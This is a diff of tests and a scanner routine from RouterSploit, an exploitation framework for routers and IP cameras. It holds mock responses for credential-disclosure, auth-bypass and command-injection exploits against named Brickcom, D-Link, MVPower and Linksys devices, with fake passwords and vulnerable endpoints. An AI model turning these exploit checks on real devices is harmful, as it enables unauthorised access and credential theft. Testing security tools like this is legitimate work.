elif exploit.target_protocol == Protocol.TELNET:
exploit.port = self.telnet_port
else:
continue
response = exploit.check_default()
if response:
print_info("\033[92m[+]\033[0m", "{}:{} {} {} is vulnerable".format(
exploit.target, exploit.port, exploit.target_protocol, exploit))
for creds in response:
self.creds.append(creds)
else:
......
rsf.py
......@@ -18,5 +18,6 @@ def routersploit():
rsf = RoutersploitInterpreter()
rsf.start()
if __name__ == "__main__":
routersploit()
tests/conftest.py
import pytest
from unittest.mock import patch
from threat9_test_bed.scenarios import HttpScenario
from threat9_test_bed.service_mocks import HttpScenarioService, HttpServiceMock
from threat9_test_bed.scenarios import TelnetScenario
from threat9_test_bed.service_mocks.telnet_service_mock import TelnetServiceMock
import routersploit.core.exploit.shell
@pytest.fixture
def target():
with HttpServiceMock("127.0.0.1", 0) as target_:
yield target_
@pytest.fixture(scope="session")
def empty_target():
with HttpScenarioService("127.0.0.1", 0,
......@@ -55,8 +53,8 @@ def timeout_target():
HttpScenario.TIMEOUT) as http_service:
yield http_service
@pytest.fixture
def generic_target():
with TelnetServiceMock("127.0.0.1", 0, TelnetScenario.AUTHORIZED) as telnet_service:
yield telnet_service
tests/creds/cameras/basler/test_webinterface_default_creds.py
from flask import request
from routersploit.modules.creds.cameras.basler.webinterface_http_form_default_creds import Exploit
......@@ -6,7 +5,7 @@ def test_check_success(target):
""" Test scenario - successful check """
route_mock = target.get_route_mock("/cgi-bin/auth_if.cgi", methods=["GET", "POST"])
route_mock.return_value = "success: true"
route_mock.return_value = "success: true"
exploit = Exploit()
exploit.target = target.host
......
tests/creds/generic/test_ftp_bruteforce.py
......@@ -8,7 +8,6 @@ def test_check_success(generic_target):
exploit.target = generic_target.host
exploit.port = generic_target.port
assert exploit.check() is False
assert exploit.check_default() is None
assert exploit.run() is None
tests/exploits/cameras/brickcom/test_corp_network_cameras_conf_disclosure.py
......@@ -2,31 +2,31 @@ from routersploit.modules.exploits.cameras.brickcom.corp_network_cameras_conf_di
configfile = (
"DeviceBasicInfo.firmwareVersion=v3.0.6.12"
"DeviceBasicInfo.macAddress=00:00:00:00:00:00"
"DeviceBasicInfo.sensorID=OV9X11"
"DeviceBasicInfo.internalName=Brickcom"
"DeviceBasicInfo.productName=Di-1092AX"
"DeviceBasicInfo.displayName=CB-1092AX"
"DeviceBasicInfo.modelNumber=XXX"
"DeviceBasicInfo.companyName=Brickcom Corporation"
"DeviceBasicInfo.comments=[CUBE HD IPCam STREEDM]"
"DeviceBasicInfo.companyUrl=www.brickcom.com"
"DeviceBasicInfo.serialNumber=AXNB02B211111"
"DeviceBasicInfo.skuType=LIT"
"DeviceBasicInfo.ledIndicatorMode=1"
"DeviceBasicInfo.minorFW=1"
"DeviceBasicInfo.hardwareVersion="
"DeviceBasicInfo.PseudoPDseProdNum=P3301"
"AudioDeviceSetting.muted=0"
"UserSetSetting.userList.size=2"
"UserSetSetting.userList.users0.index=0"
"UserSetSetting.userList.users0.password=MyM4st3rP4ss"
"UserSetSetting.userList.users0.privilege=1"
"UserSetSetting.userList.users0.username=Cam_User"
"UserSetSetting.userList.users1.index=0"
"UserSetSetting.userList.users1.password=C0mm0mP4ss"
)
"DeviceBasicInfo.firmwareVersion=v3.0.6.12"
"DeviceBasicInfo.macAddress=00:00:00:00:00:00"
"DeviceBasicInfo.sensorID=OV9X11"
"DeviceBasicInfo.internalName=Brickcom"
"DeviceBasicInfo.productName=Di-1092AX"
"DeviceBasicInfo.displayName=CB-1092AX"
"DeviceBasicInfo.modelNumber=XXX"
"DeviceBasicInfo.companyName=Brickcom Corporation"
"DeviceBasicInfo.comments=[CUBE HD IPCam STREEDM]"
"DeviceBasicInfo.companyUrl=www.brickcom.com"
"DeviceBasicInfo.serialNumber=AXNB02B211111"
"DeviceBasicInfo.skuType=LIT"
"DeviceBasicInfo.ledIndicatorMode=1"
"DeviceBasicInfo.minorFW=1"
"DeviceBasicInfo.hardwareVersion="
"DeviceBasicInfo.PseudoPDseProdNum=P3301"
"AudioDeviceSetting.muted=0"
"UserSetSetting.userList.size=2"
"UserSetSetting.userList.users0.index=0"
"UserSetSetting.userList.users0.password=MyM4st3rP4ss"
"UserSetSetting.userList.users0.privilege=1"
"UserSetSetting.userList.users0.username=Cam_User"
"UserSetSetting.userList.users1.index=0"
"UserSetSetting.userList.users1.password=C0mm0mP4ss"
)
def test_check_v1_success(target):
......
tests/exploits/cameras/brickcom/test_users_cgi_creds_disclosure.py
......@@ -4,30 +4,29 @@ from routersploit.modules.exploits.cameras.brickcom.users_cgi_creds_disclosure i
response = (
"""
size=4
User1.index=1
User1.username=admin
User1.password=test1234
User1.privilege=1
User2.index=2
User2.username=viewer
User2.password=viewer
User2.privilege=0
User3.index=3
User3.username=rviewer
User3.password=rviewer
User3.privilege=2
User4.index=0
User4.username=visual
User4.password=visual1234
User4.privilege=0
""")
"""
size=4
User1.index=1
User1.username=admin
User1.password=test1234
User1.privilege=1
User2.index=2
User2.username=viewer
User2.password=viewer
User2.privilege=0
User3.index=3
User3.username=rviewer
User3.password=rviewer
User3.privilege=2
User4.index=0
User4.username=visual
User4.password=visual1234
User4.privilege=0
"""
)
def apply_response(*args, **kwargs):
......
tests/exploits/cameras/dlink/test_dcs_930l_932l_auth_bypass.py
from flask import request, Response
from flask import Response
from base64 import b64decode
from routersploit.modules.exploits.cameras.dlink.dcs_930l_932l_auth_bypass import Exploit
content = b64decode(b"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")
content = b64decode(b"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")
def apply_response(*args, **kwargs):
......
tests/exploits/cameras/multi/test_dvr_creds_disclosure.py
......@@ -13,4 +13,3 @@ def test_check_success(target):
assert exploit.check()
assert exploit.run() is None
tests/exploits/cameras/mvpower/test_dvr_jaws_rce.py
......@@ -6,7 +6,7 @@ from routersploit.modules.exploits.cameras.mvpower.dvr_jaws_rce import Exploit
def apply_response(*args, **kwargs):
cmd = request.query_string
res = re.findall(b"echo%20(.+)", cmd)
res = re.findall(b"echo%20(.+)", cmd)
if res:
return str(res[0], "utf-8"), 200
......
tests/exploits/routers/dlink/test_dir_645_password_disclosure.py
......@@ -13,7 +13,7 @@ def test_check_success(target):
<service>DEVICE.ACCOUNT</service>
<device>
<gw_name>DIR-645</gw_name>
<account>
<seqno>2</seqno>
<max>2</max>
......
tests/exploits/routers/dlink/test_dir_850l_creds_disclosure.py
......@@ -12,37 +12,37 @@ def test_check_success(target):
"<gw_name>DIR-850L</gw_name>"
"<account>"
"<seqno>1</seqno>"
"<max>2</max>"
"<count>1</count>"
"<entry>"
"<uid>USR-</uid>"
"<name>Admin</name>"
"<usrid></usrid>"
"<password>92830535</password>"
"<group>0</group>"
"<description></description>"
"</entry>"
"</account>"
"<group>"
"<seqno></seqno>"
"<max></max>"
"<count>0</count>"
"</group>"
"<session>"
"<captcha>0</captcha>"
"<dummy></dummy>"
"<timeout>180</timeout>"
"<maxsession>128</maxsession>"
"<maxauthorized>16</maxauthorized>"
"</session>"
"</device>"
"</module>"
"<?xml version=\"1.0\" encoding=\"utf-8\"?>"
"<hedwig>"
"<result>OK</result>"
"<node></node>"
"<message>No modules for Hedwig</message>"
"</hedwig>"
" <max>2</max>"
" <count>1</count>"
" <entry>"
" <uid>USR-</uid>"
" <name>Admin</name>"
" <usrid></usrid>"
" <password>92830535</password>"
" <group>0</group>"
" <description></description>"
" </entry>"
" </account>"
" <group>"
" <seqno></seqno>"
" <max></max>"
" <count>0</count>"
" </group>"
" <session>"
" <captcha>0</captcha>"
" <dummy></dummy>"
" <timeout>180</timeout>"
" <maxsession>128</maxsession>"
" <maxauthorized>16</maxauthorized>"
" </session>"
" </device>"
" </module>"
" <?xml version=\"1.0\" encoding=\"utf-8\"?>"
" <hedwig>"
" <result>OK</result>"
" <node></node>"
" <message>No modules for Hedwig</message>"
" </hedwig>"
)
exploit = Exploit()
......
tests/exploits/routers/dlink/test_dir_8xx_password_disclosure.py
......@@ -51,7 +51,7 @@ def apply_response():
def test_exploit_success(target):
""" Test scenario - successful exploitation """
""" Test scenario - successful exploitation """
cgi_mock = target.get_route_mock("/getcfg.php", methods=["GET", "POST"])
cgi_mock.side_effect = apply_response
......
tests/exploits/routers/linksys/test_smartwifi_password_disclosure.py
......@@ -4,7 +4,7 @@ from routersploit.modules.exploits.routers.linksys.smartwifi_password_disclosure
def test_check_success(target):
""" Test scenario - successful check """
route_mock= target.get_route_mock("/.htpasswd", methods=["GET"])
route_mock = target.get_route_mock("/.htpasswd", methods=["GET"])
route_mock.return_value = (
'admin:$1$3Eb757jl$zFM3Mtk8Qmkp3kjbRukUq/'
)
......
tests/exploits/routers/multi/test_gpon_home_gateway_rce.py
